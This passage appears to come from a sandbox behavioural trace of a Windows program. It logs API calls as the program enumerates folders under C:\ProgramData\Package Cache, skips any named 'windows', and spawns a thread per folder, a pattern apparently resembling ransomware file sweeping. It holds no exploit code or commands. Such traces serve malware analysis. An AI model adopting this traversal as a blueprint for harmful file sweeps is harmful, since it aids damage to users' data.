| out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0039.598] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" [0039.598] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108b0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.605] CloseHandle (hObject=0x18c) returned 1 [0039.605] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0039.605] lstrcmpW (lpString1=".", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned -1 [0039.605] lstrcmpW (lpString1="..", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned -1 [0039.605] lstrcmpiW (lpString1="windows", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 1 [0039.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.607] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.607] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0039.607] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0039.607] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108c8590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.609] CloseHandle (hObject=0x18c) returned 1 [0039.609] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1 [0039.609] lstrcmpW (lpString1=".", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned -1 [0039.609] lstrcmpW (lpString1="..", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned -1 [0039.609] lstrcmpiW (lpString1="windows", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 1 [0039.611] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.611] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.611] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0039.611] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" [0039.611] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108e05f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.613] CloseHandle (hObject=0x18c) returned 1 [0039.613] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1 [0039.613] lstrcmpW (lpString1=".", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned -1 [0039.613] lstrcmpW (lpString1="..", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned -1 [0039.613] lstrcmpiW (lpString1="windows", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 1 [0039.615] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.615] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0039.615] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" [0039.615] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108f8660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.618] CloseHandle (hObject=0x18c) returned 1 [0039.618] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1 [0039.618] lstrcmpW (lpString1=".", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned -1 [0039.618] lstrcmpW (lpString1="..", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned -1 [0039.618] lstrcmpiW (lpString1="windows", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 1 [0039.620] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.620] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.620] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0039.620] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" [0039.620] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.620] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109106c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.621] CloseHandle (hObject=0x18c) returned 1 [0039.621] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0039.621] lstrcmpW (lpString1=".", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned -1 [0039.621] lstrcmpW (lpString1="..", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned -1 [0039.621] lstrcmpiW (lpString1="windows", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 1 [0039.623] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.623] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.623] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0039.623] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" [0039.623] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10928730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.625] CloseHandle (hObject=0x18c) returned 1 [0039.625] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0039.625] lstrcmpW (lpString1=".", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned -1 [0039.625] lstrcmpW (lpString1="..", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned -1 [0039.625] lstrcmpiW (lpString1="windows", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 1 [0039.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.627] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.627] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0039.627] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" [0039.627] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10940798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.638] CloseHandle (hObject=0x18c) returned 1 [0039.638] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0039.638] lstrcmpW (lpString1=".", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned -1 [0039.638] lstrcmpW (lpString1="..", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned -1 [0039.638] lstrcmpiW (lpString1="windows", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 1 [0039.638] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.638] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.638] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0039.638] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" [0039.638] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ed0d48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.647] CloseHandle (hObject=0x18c) returned 1 [0039.647] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0039.647] lstrcmpW (lpString1=".", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned -1 [0039.647] lstrcmpW (lpString1="..", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned -1 [0039.647] lstrcmpiW (lpString1="windows", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 1 [0039.648] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.648] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.648] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0039.648] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" [0039.648] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.648] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f18e80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0039.662] CloseHandle (hObject=0x18c) returned 1 [0039.662] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0039.662] lstrcmpW (lpString1=".", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned -1 [0039.662] lstrcmpW (lpString1="..", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned -1 [0039.662] lstrcmpiW (lpString1="windows", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 1 [0039.663] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0039.663] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0039.663] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0039.663] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0039.663] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0039.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d38660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.583] CloseHandle (hObject=0x18c) returned 1 [0040.583] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0040.583] lstrcmpW (lpString1=".", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned -1 [0040.583] lstrcmpW (lpString1="..", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned -1 [0040.583] lstrcmpiW (lpString1="windows", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 1 [0040.585] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0040.585] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0040.585] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0040.585] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" [0040.585] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0040.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110b38d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.586] CloseHandle (hObject=0x18c) returned 1 [0040.586] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1 [0040.586] lstrcmpW (lpString1=".", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned -1 [0040.586] lstrcmpW (lpString1="..", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned -1 [0040.586] lstrcmpiW (lpString1="windows", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 1 [0040.588] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0040.588] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0040.588] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", 